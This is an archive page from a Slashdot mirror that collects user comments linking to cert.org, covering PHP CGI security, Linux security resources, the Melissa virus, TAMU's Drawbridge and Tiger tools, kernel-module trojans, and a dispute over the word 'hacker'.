Slashdot Mirror

← Back to Domains

Domain: cert.org

Stories and comments across the archive that link to cert.org.

Comments · 757

  1. Re:CGI by Signal+11 · · Score: 2 · on PHP3/4 as Web Development Platform?
    And your cgi concerns aren't too well-founded. The thing you can do with the cgi version, at least under Unix, is to run it as your own user id through suExec which is quite safe.

    I think they are. Check out this CERT advisory, as well as this page from the php manual. It's certainly possible to set up a host like this guy is suggesting.. but some care needs to be taken. I'm not familiar with IIS, so I can't comment on the availability of a chroot()-style environment.

    Also, ODBC support is not new to PHP 4. It was in PHP 3 as well and it hasn't changed much.

    Okay, you caught me on this one - I went back and looked, and there is indeed support for an ODBC driver manager in php3. :}

    About your comment that php4 is open source... I quote the php4 License FAQ Second, the license prevents commercial use of the Zend library to build commercial applications. Correct me if I'm wrong.. but that sounds an aweful lot like a violation of OSD rule #1. See this link for the full monty.

    --

  2. info: security distributions & resources by maphew · · Score: 1 · on Linux in the Military

    see the Linux Weekly News' Security page for information on Linux security projects which are already under way:
    Secure Linux Projects Bastille Linux
    Khaos Linux Secure Linux
    Security List Archives
    Bugtraq Archive
    Firewall Wizards Archive
    ISN Archive

    Distribution-specific links
    Caldera Advisories
    Debian Alerts
    Red Hat Errata
    SuSE Announcements

    Miscellaneous Resources
    CERT
    CIAC
    Comp Sec News Daily
    Crypto-GRAM
    Linux Security Audit Project
    OpenSEC
    Security Focus
    SecurityPortal

  3. ZDnet Story by Krellis · · Score: 1 · on Another Windows Macro Virus Wreaks Havoc

    The ZDnet Story has more info about it, hopefully CERT will get moving on it soon.
    ---
    Tim Wilde
    Sysadmin, Dynamic DNS Network Services

  4. Naming of Melissa virus by gothwalk · · Score: 2 · on The Melissa Syndrome

    Katz writes:
    He allegedly named his virus after a topless dancer in Florida.

    As I understand it, the virus was named for part of the registry modifications it makes. I could be wrong, but the CERT advisory FAQ says: "It was named Melissa by the antivirus software vendors."

  5. Talk to TAMU about Drawbridge and Tiger by Bryan+Andersen · · Score: 4 · on Ask Slashdot: Securing Systems you don't Manage

    Talk to Texas A&M University about their tools for security. Especially their firewall Drawbridge, and Tiger security auditing scripts. They also have monitering software to moniter their internal network for cracking signatures.

    Another sorce is to look at CERT. They have lots of links to documents and articles on security. One of their documents pointed me to the TAMA stuff.

    Drawbridge is designed for blocking off site access on a machine/port by machine/port basis. Machines that pass the tiger scripts are enabled for more external access than ones that don't. As a default only SMTP is enabled from off site to a machine. Higher levels of external access can be obtained when a machine meats tighter security levels.

    One of the nice things about Drawbridge is it can be run on a PC, and securly remotly updated. It also uses lookup tables so it's fast. It is a memory hog, but then that's the price for speed. I belive it will only work for Class B and C networks.

    Email me at bryan@visi.com, and I'll gather a bunch of related links from my bookmarks at home. There are some good PDFs on their experiences, and the tools they made to implement security.

    I've been dealing with security alot lately as I've recently setup a firewall for my home system. I personally don't use Drawbridge as my network is small and Linux IPCHAINS is more suited to my system. I do use some of the Tiger scripts for auditing. I also use Tripwire (available from CERT).

  6. Mettler's attack slightly different by KMSelf · · Score: 1 · on Trojan Added to TCP Wrappers Source on FTP
    Mettler's attack is a modification of your system by a trusted user, via source. It's slightly different from the TCP-Wrapers crack in that you presumably don't have extensive peer review over your own system.

    Researching a different topic I came across an interesting CERT advisory regarding loadable kernel modules. One common response to Mettler was that any kernel hack would require recompiling the kernel, and restarting the system. With loadable modules, system restart isn't necessary -- the kernel can be modified in place, as it runs.

    In all three instances, confirming source, object, or image against a trusted verion would help in detection. Kernel compromise is a frightening prospect as it undermines the trustworthyness of the entire system. Booting a fresh kernel, however, removes the damage (you then have to keep the rogue modules out).

  7. Stop calling them "hackers" and legimitizing them. by Anonymous Coward · · Score: 0 · on LoU's Iraq/China Attack Correction

    Umm, the correct term in this case is "hacking organizations." The Cult of the Dead cow and L0pht are unquestionably respectable hacker groups, not hax0r d00dz.
    While there is some amount of hackish activity in the true sense in those groups, they can't be called "hacking organisation". A hacking organisation is for instance the FreeBSD core team or the Samba team. If you look at the site of L0pht (and why the hell are they namming their organization like hax0r d00dz would do ???), you'll see everywhere the word crack ; currently on the site they is an add for "L0phtcrack" with the slogan "Sniff. Crack. Faster", links to obvious crackers sites like "Hackers News Network", etc...
    Yes, they don't infringe the law, but they are constantly, implicitly or explicitly, advocate cracking systems, or idealize cracking as being cool, and constantly use crackerspeak, and crackers attitude (crackers' attitude is close to the caricature of show-offs doing rap music: "Yo my brother, we are cool and mighty and rebels").
    I'm sorry but if I'd see on a site from some organisation with an add with "Rape. Murder. Theft", constant implicit praise of rapes, murders and thefts, and associated with in any reference to a technique to for instance to avoid Russian Mafia's murderers, a note such as "of course as usual these advices can also be used to commit murders, and to get rid of your wife or your neighbor", with links to sites selling weapons, then I legitimaly won't call this organisation a "respectable" organisation.
    I agree that since their primary goal is not cracking, "cracking organisations" is perhaps too much, but since they one of the primaly source of code and information of "hax0r d00dz", and since they are adopting partly cracckers' viewpoint, and entirely their attitude and language, it is indiscutably more appropriate to call them "cracking organizations" than "hacking organizations". Maybe it would be even more appropriate to call them "organization focusing on security problems with a cretinous rebel attitude, hax0r-d00dz language and dubious sympathy for crackers". But never, NEVER, a "hacking organization". Again a typical "hacking organizations" is the FreeBSD core team. For an organization without a idiotic I'm-cool-dude attitude and focusing on security problems, see CERT site.
    And i dunno where ESR got this cracker thing from."
    Probably from Real Life(tm). Get your head out of the lame self-promoting crackers' sites, you'll see that everywhere else, crackers are considered as nuisance, misguided teenagers and at worse hopeless moronic assholes.